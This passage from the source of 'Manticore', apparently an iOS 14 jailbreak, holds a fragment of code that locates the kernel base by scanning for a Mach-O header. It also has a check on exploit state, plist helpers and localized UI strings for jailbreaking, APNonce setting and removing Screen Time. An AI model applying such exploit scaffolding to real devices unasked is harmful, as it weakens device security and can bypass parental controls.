252 | #ifdef __arm64e__ /* switch on cpu subtype */
253 | 0x02, 0x00, 0x00, 0xc0, /* 0xC0000002 */
254 | #else
255 | 0x00, 0x00, 0x00, 0x00, /* 0x00000000 */
256 | #endif
257 | 0x02, 0x00, 0x00, 0x00 /* 0x00000002 */
258 | };
259 |
260 | p_kernel_base = (kptr_t) bmh_search(macho_header, sizeof(macho_header), (unsigned char *)start, v_kernel_size);
261 | }
262 |
--------------------------------------------------------------------------------
/manticore/reton.xcdatamodeld/reton.xcdatamodel/contents:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/manticore/util/arm.m:
--------------------------------------------------------------------------------
1 | //
2 | // arm.m
3 | // manticore
4 | //
5 | // Created by 21 on 14.03.21.
6 | //
7 |
8 | #import
9 | #include "include/lib/tq/tq_common_p.h"
10 | #include "include/util/arm.h"
11 |
12 | int is_pac() {
13 | return g_exp.has_PAC;
14 | }
15 |
--------------------------------------------------------------------------------
/manticore/util/plistutils.mm:
--------------------------------------------------------------------------------
1 | //
2 | // plistutils.m
3 | // manticore
4 | //
5 | // Created by ??? on 7/3/21.
6 | //
7 |
8 | #import
9 |
10 | /* what the fuck does this do
11 | * -fugiefire */
12 | bool modifyPlist(NSString *filename, void (^function)(id)) {
13 | NSData *data = [NSData dataWithContentsOfFile:filename];
14 | if (data == nil) return false;
15 | NSPropertyListFormat format;
16 | NSError *error = nil;
17 | id plist = [NSPropertyListSerialization propertyListWithData:data options:NSPropertyListMutableContainersAndLeaves format:&format error:&error];
18 | if (plist == nil) return false;
19 | if (function) function(plist);
20 | NSData *newData = [NSPropertyListSerialization dataWithPropertyList:plist format:format options:0 error:&error];
21 | if (newData == nil) return false;
22 | if (![data isEqual:newData]) if (![newData writeToFile:filename atomically:YES]) return false;
23 | return true;
24 | }
25 |
26 | bool createEmptyPlist(NSString *filename) {
27 | NSMutableDictionary *plist = [[NSMutableDictionary alloc] init];
28 | plist[@"test"] = @"test";
29 | return [plist writeToFile:filename atomically:YES];
30 | }
31 |
32 | NSDictionary *readPlist(NSString *filename) {
33 | NSURL *url = [NSURL fileURLWithPath:filename];
34 | NSError *error;
35 | NSData *data = [NSData dataWithContentsOfURL:url options:0 error:&error];
36 | NSDictionary *dictionary = [NSPropertyListSerialization propertyListWithData:data options:0 format:nil error:&error];
37 |
38 | if (!error) return dictionary;
39 | return 0;
40 | }
41 |
--------------------------------------------------------------------------------
/manticore/util/util.mm:
--------------------------------------------------------------------------------
1 | //
2 | // util.m
3 | // manticore
4 | //
5 | // Created by admin on 7/3/21.
6 | //
7 |
8 | #import
9 |
10 | NSString *programVersion() {
11 | return [[NSBundle mainBundle] objectForInfoDictionaryKey:@"CFBundleVersion"];
12 | }
13 |
--------------------------------------------------------------------------------
/manticore/zh-Hant.lproj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/zh-Hant.lproj/Main.strings:
--------------------------------------------------------------------------------
1 |
2 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "0il-tf-sNa"; */
3 | "0il-tf-sNa.text" = "Manticore";
4 |
5 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
6 | "0yi-4F-L8u.text" = "設定APNonce";
7 |
8 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
9 | "2Nf-dY-FJy.text" = "啟用插件";
10 |
11 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "6hM-Fc-FDp"; */
12 | "6hM-Fc-FDp.normalTitle" = "Jailbreak";
13 |
14 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
15 | "AVZ-qX-0ms.text" = "回復RootFS";
16 |
17 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
18 | "B09-wX-UeI.normalTitle" = "Jailbreak";
19 |
20 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
21 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
22 |
23 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "Kda-OK-gFg"; */
24 | "Kda-OK-gFg.text" = "iOS 14.0 - 14.3";
25 |
26 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
27 | "WEh-zy-xS5.normalTitle" = "設定並保存APNonce";
28 |
29 | /* Class = "UIButton"; normalTitle = "Options Button"; ObjectID = "czz-vo-cHF"; */
30 | "czz-vo-cHF.normalTitle" = "選項";
31 |
32 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
33 | "efL-nQ-xsh.text" = "禁用OTA更新";
34 |
35 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
36 | "i1H-yX-3n8.text" = "兼容性";
37 |
38 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
39 | "kyq-MK-M3C.text" = "移除螢幕使用時間";
40 |
41 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
42 | "mUJ-nK-XHv.text" = "Manticore";
43 |
44 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
45 | "o5h-H3-igh.text" = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!";
46 |
47 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
48 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
49 |
50 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
51 | "voS-Ev-D3K.text" = "記錄ECID";
52 |
53 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
54 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
55 |
56 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
57 | "yiE-wg-tPU.text" = "開啟記錄視窗";
58 |
59 | /* Class = "UILabel"; text = "Settings"; ObjectID = "KVP-vA-4W2"; */
60 | "KVP-vA-4W2.text" = "設定";
61 |
62 | /* Class = "UILabel"; text = "Package Management"; ObjectID = "8lS-uL-LxK"; */
63 | "8lS-uL-LxK.text" = "套件管理器";
64 |
65 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "bFz-pN-VmJ"; */
66 | "bFz-pN-VmJ.text" = "回復RootFS";
67 |
68 | /* Class = "UILabel"; text = "Disable Updates"; ObjectID = "K4g-i5-DXs"; */
69 | "K4g-i5-DXs.text" = "禁用(OTA)更新";
70 |
71 | /* Class = "UILabel"; text = "Max Memory Limit"; ObjectID = "hav-yD-P83"; */
72 | "hav-yD-P83.text" = "最大記憶體限制";
73 |
74 | /* Class = "UILabel"; text = "Load Tweaks"; ObjectID = "ntj-8w-lbe"; */
75 | "ntj-8w-lbe.text" = "加載插件";
76 |
77 | /* Class = "UILabel"; text = "Load Daemons"; ObjectID = "kFD-2g-aOl"; */
78 | "kFD-2g-aOl.text" = "加載守護程式";
79 |
80 | /* Class = "UILabel"; text = "Show Log Window"; ObjectID = "GyA-VR-ZRI"; */
81 | "GyA-VR-ZRI.text" = "顯示記錄視窗";
82 |
83 | /* Class = "UILabel"; text = "Disable Screen Time"; ObjectID = "8Oy-13-2xy"; */
84 | "8Oy-13-2xy.text" = "禁用螢幕使用時間";
85 |
--------------------------------------------------------------------------------